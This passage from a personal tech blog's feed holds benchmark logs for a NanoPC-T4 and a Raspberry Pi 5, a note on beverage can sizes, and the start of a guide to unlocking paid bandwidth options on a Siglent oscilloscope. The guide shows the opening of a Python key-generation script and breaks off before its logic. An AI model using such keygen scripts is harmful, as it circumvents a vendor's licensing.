class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span 
class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">disappear9@nanopct4:~$ sysbench cpu --cpu-max-prime=20000 --threads=6 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 6</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 2498.63</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0029s</span><br><span class="line"> total number of events: 25002</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 1.42</span><br><span class="line"> avg: 2.40</span><br><span class="line"> max: 16.88</span><br><span class="line"> 95th percentile: 3.62</span><br><span class="line"> sum: 59998.36</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 4167.0000/1956.22</span><br><span class="line"> execution time (avg/stddev): 9.9997/0.00</span><br><span class="line"></span><br><span class="line"></span><br><span 
class="line">disappear9@nanopct4:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 692.27</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0012s</span><br><span class="line"> total number of events: 6926</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 1.42</span><br><span class="line"> avg: 1.44</span><br><span class="line"> max: 12.87</span><br><span class="line"> 95th percentile: 1.44</span><br><span class="line"> sum: 9997.66</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 6926.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 9.9977/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:Rockchip RK3399<br>RAM:4G </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@nanopct4</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P&quot;&quot; &quot;&quot;&quot;Y$$.&quot;. Kernel: aarch64 Linux 6.12.44-current-rockchip64</span><br><span class="line"> ,$$P&#x27; `$$$. Uptime: 15m</span><br><span class="line">&#x27;,$$P ,ggs. `$$b: Packages: 366</span><br><span class="line">`d$$&#x27; ,$P&quot;&#x27; . $$$ Shell: bash</span><br><span class="line"> $$P d$&#x27; , $$P Disk: 4.8G / 485G (2%)</span><br><span class="line"> $$: $$. - ,d$$&#x27; CPU: ARM Cortex-A53 Cortex-A72 @ 6x 1.416GHz</span><br><span class="line"> $$\; Y$b._ _,d$P&#x27; RAM: 4G</span><br><span class="line"> Y$$. `.`&quot;Y$$$$P&quot;&#x27;</span><br><span class="line"> `$$b &quot;-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `&quot;Y$b._</span><br><span class="line"> `&quot;&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>Common Item Size Records</title>
<link href="https://thinkalone.win/Common-Item-Sizes.html"/>
<id>https://thinkalone.win/Common-Item-Sizes.html</id>
<published>2025-06-01T04:00:00.000Z</published>
<updated>2025-06-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>A record of the dimensions of some common items; the default unit is millimetres (mm)<br>Last updated: 2025/06/01<br>Data currently available: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Beverage cans: </span><br><span class="line">330mL/11.6 imp fl oz/11.2 us fl oz </span><br><span class="line">330mL/High/tall/sleek can (摩登罐) </span><br><span class="line">473mL/16.6 imp fl oz/16 us fl oz </span><br></pre></td></tr></table></figure><span id="more"></span><h2 id="易拉罐:"><a href="#易拉罐:" class="headerlink" title="易拉罐:"></a>Beverage cans:</h2><h3 id="330mL"><a href="#330mL" class="headerlink" title="330mL"></a>330mL</h3><p><img src="/pictures/Common-Item-Sizes/Cans/330ml-D.png" alt="330ml-D.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-D2.png" alt="330ml-D2.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-H.png" alt="330ml-H.png"> </p><h3 id="330mL-High"><a href="#330mL-High" class="headerlink" title="330mL High"></a>330mL High</h3><p><img src="/pictures/Common-Item-Sizes/Cans/330ml-tall-D.png" alt="330ml-tall-D.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-tall-D2.png" alt="330ml-tall-D2.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-tall-H.png" alt="330ml-tall-H.png"> </p><h3 id="473mL-16oz"><a href="#473mL-16oz" class="headerlink" title="473mL 16oz"></a>473mL 16oz</h3><p><img src="/pictures/Common-Item-Sizes/Cans/473ml-D.png" alt="473ml-D.png"><br><img src="/pictures/Common-Item-Sizes/Cans/473ml-D2.png" alt="473ml-D2.png"><br><img src="/pictures/Common-Item-Sizes/Cans/473ml-H.png" alt="473ml-H.png"><br><img src="/pictures/Common-Item-Sizes/Cans/473ml-H2.png" alt="473ml-H2.png"> </p>]]></content>
<summary type="html"><p>A record of the dimensions of some common items; the default unit is millimetres (mm)<br>Last updated: 2025&#x2F;06&#x2F;01<br>Data currently available: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Beverage cans: </span><br><span class="line">330mL/11.6 imp fl oz/11.2 us fl oz </span><br><span class="line">330mL/High/tall/sleek can (摩登罐) </span><br><span class="line">473mL/16.6 imp fl oz/16 us fl oz </span><br></pre></td></tr></table></figure></summary>
<category term="杂项" scheme="https://thinkalone.win/categories/%E6%9D%82%E9%A1%B9/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
</entry>
<entry>
<title>Raspberry Pi 5 CPU Benchmark</title>
<link href="https://thinkalone.win/RPi5-CPU-Benchmark.html"/>
<id>https://thinkalone.win/RPi5-CPU-Benchmark.html</id>
<published>2025-03-10T04:00:00.000Z</published>
<updated>2025-03-10T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:BCM2835<br>RAM:4G </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> ./+o+- disappear9@Pi5</span><br><span class="line"> yyyyy- -yyyyyy+ OS: Ubuntu 24.04 noble</span><br><span class="line"> ://+//////-yyyyyyo Kernel: aarch64 Linux 6.8.0-1020-raspi</span><br><span class="line"> .++ .:/++++++/-.+sss/` Uptime: 32m</span><br><span class="line"> .:++o: /++++++++/:--:/- Packages: 2548</span><br><span class="line"> o:+o+:++.`..```.-/oo+++++/ Shell: bash 5.2.21</span><br><span class="line"> .:+o:+o/. `+sssoo+/ Resolution: 4480x1440</span><br><span class="line"> .++/+:+oo+o:` /sssooo. WM: Not Found</span><br><span class="line">/+++//+:`oo+o /::--:. GTK Theme: Adwaita [GTK3]</span><br><span class="line">\+/+o+++`o++o ++////. Disk: 7.9G / 57G (15%)</span><br><span class="line"> .++.o+++oo+:` /dddhhh. CPU: ARM Cortex-A76 @ 4x 2.4GHz</span><br><span class="line"> .+.o+oo:. 
`oddhhhh+ RAM: 470MiB / 3984MiB</span><br><span class="line"> \+.++o+o``-````.:ohdhhhhh+</span><br><span class="line"> `:o+++ `ohhhhhhhhyo++os:</span><br><span class="line"> .o:`.syhhhhhhh/.oo++o`</span><br><span class="line"> /osyyyyyyo++ooo+++/</span><br><span class="line"> ````` +oo+++o\:</span><br><span class="line"> `oo++.</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 23.01:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Pi5:~$ 7z b -mmt4</span><br><span class="line"></span><br><span class="line">7-Zip 23.01 (arm64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20</span><br><span class="line"> 64-bit arm_v:8 locale=C.UTF-8 Threads:4 OPEN_MAX:1024</span><br><span class="line"></span><br><span class="line"> mt4</span><br><span class="line">Compiler: 13.2.0 GCC 13.2.0</span><br><span class="line">Linux : 6.8.0-1020-raspi : #24-Ubuntu SMP PREEMPT_DYNAMIC Sun Feb 23 08:39:32 UTC 2025 : aarch64</span><br><span class="line">PageSize:4KB THP:madvise hwcap:119FFF:CRC32:SHA1:SHA2:AES:ASIMD</span><br><span class="line">LE</span><br><span class="line"></span><br><span class="line">1T CPU Freq (MHz): 2130 2394 2394 2394 2394 2394 2394</span><br><span class="line">2T CPU Freq (MHz): 200% 2382 200% 2394</span><br><span class="line"></span><br><span class="line">RAM size: 3984 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 889 MB, # Benchmark threads: 4</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 10993 374 2857 10695 | 160334 396 3455 13679</span><br><span class="line">23: 10165 380 2727 10358 | 157739 399 3422 13649</span><br><span class="line">24: 9693 382 2727 10422 | 154513 399 3402 13560</span><br><span class="line">25: 9088 381 2725 10377 | 150242 399 3349 13371</span><br><span class="line">---------------------------------- | 
------------------------------</span><br><span class="line">Avr: 9985 379 2759 10463 | 155707 398 3407 13565</span><br><span class="line">Tot: 389 3083 12014</span><br><span class="line">disappear9@Pi5:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip 23.01 (arm64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20</span><br><span class="line"> 64-bit arm_v:8 locale=C.UTF-8 Threads:4 OPEN_MAX:1024</span><br><span class="line"></span><br><span class="line"> mt1</span><br><span class="line">Compiler: 13.2.0 GCC 13.2.0</span><br><span class="line">Linux : 6.8.0-1020-raspi : #24-Ubuntu SMP PREEMPT_DYNAMIC Sun Feb 23 08:39:32 UTC 2025 : aarch64</span><br><span class="line">PageSize:4KB THP:madvise hwcap:119FFF:CRC32:SHA1:SHA2:AES:ASIMD</span><br><span class="line">LE</span><br><span class="line"></span><br><span class="line">1T CPU Freq (MHz): 1490 1495 2134 2394 2394 2394 2394</span><br><span class="line"></span><br><span class="line">RAM size: 3984 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 437 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 3509 100 3420 3414 | 42244 100 3604 3607</span><br><span class="line">23: 3261 100 3325 3323 | 41559 100 3603 3597</span><br><span class="line">24: 3136 100 3381 3373 | 40745 100 3577 3577</span><br><span class="line">25: 3010 100 3442 3437 | 39720 100 3529 3535</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 3229 100 3392 3387 | 41067 100 3579 3579</span><br><span class="line">Tot: 100 3485 3483</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>phoronix-test-suite benchmark 
compress-7zip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span 
class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Pi5:~/phoronix-test-suite$ ./phoronix-test-suite benchmark compress-7zip</span><br><span class="line"></span><br><span class="line">Phoronix Test Suite v10.8.4</span><br><span class="line"></span><br><span class="line"> To Install: pts/compress-7zip-1.11.0</span><br><span class="line"></span><br><span class="line"> pts/compress-7zip-1.11.0:</span><br><span class="line"> Test Installation 1 of 1</span><br><span class="line"> 1 File Needed [1.42 MB]</span><br><span class="line"> Downloading: 7z2405-src.tar.xz</span><br><span class="line"></span><br><span class="line">System Information</span><br><span class="line"></span><br><span class="line"> PROCESSOR: ARMv8 Cortex-A76 @ 2.40GHz</span><br><span class="line"> Core Count: 4</span><br><span class="line"> Scaling Driver: cpufreq-dt ondemand</span><br><span class="line"></span><br><span class="line"> GRAPHICS:</span><br><span class="line"> Screen: 4480x1440</span><br><span class="line"></span><br><span class="line"> MOTHERBOARD: Raspberry Pi 5 Model B Rev 1.0</span><br><span class="line"> Chipset: Broadcom BCM2712</span><br><span class="line"> Network: Raspberry Pi RP1 PCIe 2.0 South Bridge</span><br><span class="line"></span><br><span class="line"> MEMORY: 4096MB</span><br><span class="line"></span><br><span class="line"> DISK: 62GB SA64G</span><br><span class="line"> File-System: ext4</span><br><span class="line"> Mount Options: relatime rw</span><br><span 
class="line"> Disk Details: Block Size: 4096</span><br><span class="line"></span><br><span class="line"> OPERATING SYSTEM: Ubuntu 24.04</span><br><span class="line"> Kernel: 6.8.0-1020-raspi (aarch64)</span><br><span class="line"> Display Server: X Server</span><br><span class="line"> Compiler: GCC 13.3.0</span><br><span class="line"> Security: gather_data_sampling: Not affected</span><br><span class="line"> + itlb_multihit: Not affected</span><br><span class="line"> + l1tf: Not affected</span><br><span class="line"> + mds: Not affected</span><br><span class="line"> + meltdown: Not affected</span><br><span class="line"> + mmio_stale_data: Not affected</span><br><span class="line"> + reg_file_data_sampling: Not affected</span><br><span class="line"> + retbleed: Not affected</span><br><span class="line"> + spec_rstack_overflow: Not affected</span><br><span class="line"> + spec_store_bypass: Mitigation of SSB disabled via prctl</span><br><span class="line"> + spectre_v1: Mitigation of __user pointer sanitization</span><br><span class="line"> + spectre_v2: Mitigation of CSV2 BHB</span><br><span class="line"> + srbds: Not affected</span><br><span class="line"> + tsx_async_abort: Not affected</span><br><span class="line"></span><br><span class="line">7-Zip Compression 24.05:</span><br><span class="line"> pts/compress-7zip-1.11.0</span><br><span class="line"> Test 1 of 1</span><br><span class="line"> Estimated Trial Run Count: 3</span><br><span class="line"> Estimated Time To Completion: 17 Minutes [07:36 UTC]</span><br><span class="line"> Started Run 1 @ 07:20:28</span><br><span class="line"> Started Run 2 @ 07:21:09</span><br><span class="line"> Started Run 3 @ 07:21:50</span><br><span class="line"></span><br><span class="line"> Test: Compression Rating:</span><br><span class="line"> 10584</span><br><span class="line"> 10772</span><br><span class="line"> 10731</span><br><span class="line"></span><br><span class="line"> Average: 10696 MIPS</span><br><span class="line"> 
Deviation: 0.92%</span><br><span class="line"></span><br><span class="line"> Test: Decompression Rating:</span><br><span class="line"> 13478</span><br><span class="line"> 13524</span><br><span class="line"> 13528</span><br><span class="line"></span><br><span class="line"> Average: 13510 MIPS</span><br><span class="line"> Deviation: 0.21%</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Pi5:~$ sysbench cpu --cpu-max-prime=20000 --threads=4 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 4</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 4128.44</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0010s</span><br><span class="line"> total number of events: 41295</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 0.96</span><br><span class="line"> avg: 0.97</span><br><span class="line"> max: 10.02</span><br><span class="line"> 95th percentile: 0.97</span><br><span class="line"> sum: 39994.74</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> 
events (avg/stddev): 10323.7500/20.90</span><br><span class="line"> execution time (avg/stddev): 9.9987/0.00</span><br><span class="line"></span><br><span class="line">disappear9@Pi5:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 1033.96</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0007s</span><br><span class="line"> total number of events: 10342</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 0.96</span><br><span class="line"> avg: 0.97</span><br><span class="line"> max: 1.51</span><br><span class="line"> 95th percentile: 0.97</span><br><span class="line"> sum: 9998.56</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 10342.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 9.9986/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:BCM2835<br>RAM:4G </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> ./+o+- disappear9@Pi5</span><br><span class="line"> yyyyy- -yyyyyy+ OS: Ubuntu 24.04 noble</span><br><span class="line"> ://+//////-yyyyyyo Kernel: aarch64 Linux 6.8.0-1020-raspi</span><br><span class="line"> .++ .:/++++++/-.+sss/` Uptime: 32m</span><br><span class="line"> .:++o: /++++++++/:--:/- Packages: 2548</span><br><span class="line"> o:+o+:++.`..```.-/oo+++++/ Shell: bash 5.2.21</span><br><span class="line"> .:+o:+o/. `+sssoo+/ Resolution: 4480x1440</span><br><span class="line"> .++/+:+oo+o:` /sssooo. WM: Not Found</span><br><span class="line">/+++//+:`oo+o /::--:. GTK Theme: Adwaita [GTK3]</span><br><span class="line">\+/+o+++`o++o ++////. Disk: 7.9G / 57G (15%)</span><br><span class="line"> .++.o+++oo+:` /dddhhh. CPU: ARM Cortex-A76 @ 4x 2.4GHz</span><br><span class="line"> .+.o+oo:. `oddhhhh+ RAM: 470MiB / 3984MiB</span><br><span class="line"> \+.++o+o``-````.:ohdhhhhh+</span><br><span class="line"> `:o+++ `ohhhhhhhhyo++os:</span><br><span class="line"> .o:`.syhhhhhhh/.oo++o`</span><br><span class="line"> /osyyyyyyo++ooo+++/</span><br><span class="line"> ````` +oo+++o\:</span><br><span class="line"> `oo++.</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="Test Results" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="Miscellaneous" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="Test Results" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>Siglent SDS804X HD Oscilloscope Bandwidth and Option Upgrade</title>
<link href="https://thinkalone.win/SDS804X-HD-Upgrade.html"/>
<id>https://thinkalone.win/SDS804X-HD-Upgrade.html</id>
<published>2025-03-01T04:00:00.000Z</published>
<updated>2025-03-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h2 id="完成效果"><a href="#完成效果" class="headerlink" title="Result"></a>Result</h2><p>Script source: <a href="https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/">https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/</a><br>After the upgrade the model is shown as SDS824X HD: </p><p><img src="/pictures/SDS804X-HD-Upgrade/1.png"> </p><hr><span id="more"></span> <h2 id="操作步骤"><a href="#操作步骤" class="headerlink" title="Steps"></a>Steps</h2><h3 id="1-示波器连好网线,配置网络:"><a href="#1-示波器连好网线,配置网络:" class="headerlink" title="1. Connect the oscilloscope to the network with an Ethernet cable and configure the network:"></a>1. Connect the oscilloscope to the network with an Ethernet cable and configure the network:</h3><p><img src="/pictures/SDS804X-HD-Upgrade/2.png"><br><img src="/pictures/SDS804X-HD-Upgrade/3.png"><br><img src="/pictures/SDS804X-HD-Upgrade/4.png"> </p><p>Once the network is configured, the remaining steps no longer have to be done on the oscilloscope's small screen. </p><h3 id="2-打开SCPI页面"><a href="#2-打开SCPI页面" class="headerlink" title="2. Open the SCPI page"></a>2. Open the SCPI page</h3><p><img src="/pictures/SDS804X-HD-Upgrade/5.png"> </p><h3 id="3-修改并运行脚本"><a href="#3-修改并运行脚本" class="headerlink" title="3. Edit and run the script"></a>3. Edit and run the script</h3><figure class="highlight python"><figcaption><span>Python</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 
class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"><span class="comment"># Run the command MD5_SRLN? on the SCPI page to get the SCOPEID</span></span><br><span class="line">SCOPEID = <span class="string">'0000000000000000'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Find the SN on the Home page and replace this value</span></span><br><span class="line">SN = <span class="string">'SDS00000000000'</span></span><br><span class="line">Model = <span class="string">'SDS800X-HD'</span></span><br><span class="line"></span><br><span class="line">bwopt = (<span class="string">'70M'</span>, <span class="string">'100M'</span>, <span class="string">'200M'</span>)</span><br><span class="line">otheropt = (<span class="string">'PWA'</span>,)</span><br><span class="line"></span><br><span class="line">hashkey = <span 